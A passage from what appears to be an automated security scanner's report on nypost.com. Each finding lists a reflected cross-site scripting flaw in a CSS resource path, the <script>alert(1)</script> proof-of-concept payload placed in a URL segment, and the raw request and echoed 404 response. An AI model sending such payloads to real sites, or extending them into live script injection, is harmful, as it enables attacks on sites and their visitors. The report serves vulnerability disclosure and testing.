Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:20 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig7b225<script>alert(1)</script>0d0497a7126/WebPortal/nypost/blocks/media_nav/media_nav.css</p>
...[SNIP]...

1.240. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bb4cc<script>alert(1)</script>9c3cd6a2728 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortalbb4cc<script>alert(1)</script>9c3cd6a2728/nypost/blocks/media_nav/media_nav.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:22 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortalbb4cc<script>alert(1)</script>9c3cd6a2728/nypost/blocks/media_nav/media_nav.css</p>
...[SNIP]...

1.241. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b2f65<script>alert(1)</script>8c80e29cec1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypostb2f65<script>alert(1)</script>8c80e29cec1/blocks/media_nav/media_nav.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:24 GMT
Connection: close

<html><head><title>Méthode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypostb2f65<script>alert(1)</script>8c80e29cec1/blocks/media_nav/media_nav.css</p>
...[SNIP]...

1.242. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8563a<script>alert(1)</script>38ee9ec9c37 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks8563a<script>alert(1)</script>38ee9ec9c37/media_nav/media_nav.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:26 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks8563a<script>alert(1)</script>38ee9ec9c37/media_nav/media_nav.css</p>
...[SNIP]...

1.243. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 336c6<script>alert(1)</script>3bf9820cf40 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/media_nav336c6<script>alert(1)</script>3bf9820cf40/media_nav.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 723
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:28 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/media_nav336c6<script>alert(1)</script>3bf9820cf40/media_nav.css</p>
...[SNIP]...

1.244. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 9e777<script>alert(1)</script>06ce6d4472 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css9e777<script>alert(1)</script>06ce6d4472 HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 722
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:32 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfig/WebPortal/nypost/blocks/media_nav/media_nav.css9e777<script>alert(1)</script>06ce6d4472</p>
...[SNIP]...

1.245. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nypost.com
Path:   /Resource/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular.css

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fa0dc<script>alert(1)</script>33396eab501 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Resource/SysConfigfa0dc<script>alert(1)</script>33396eab501/WebPortal/nypost/blocks/most_popular/most_popular.css HTTP/1.1
Host: www.nypost.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 729
Vary: Accept-Encoding
Date: Tue, 08 Feb 2011 02:40:07 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/Resource/SysConfigfa0dc<script>alert(1)</script>33396eab501/WebPortal/nypost/blocks/most_popular/most_popular.css</p>
...[SNIP]...

1.246. http://www.nypost.com/Resource/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular.css [REST URL parameter 3]

Summary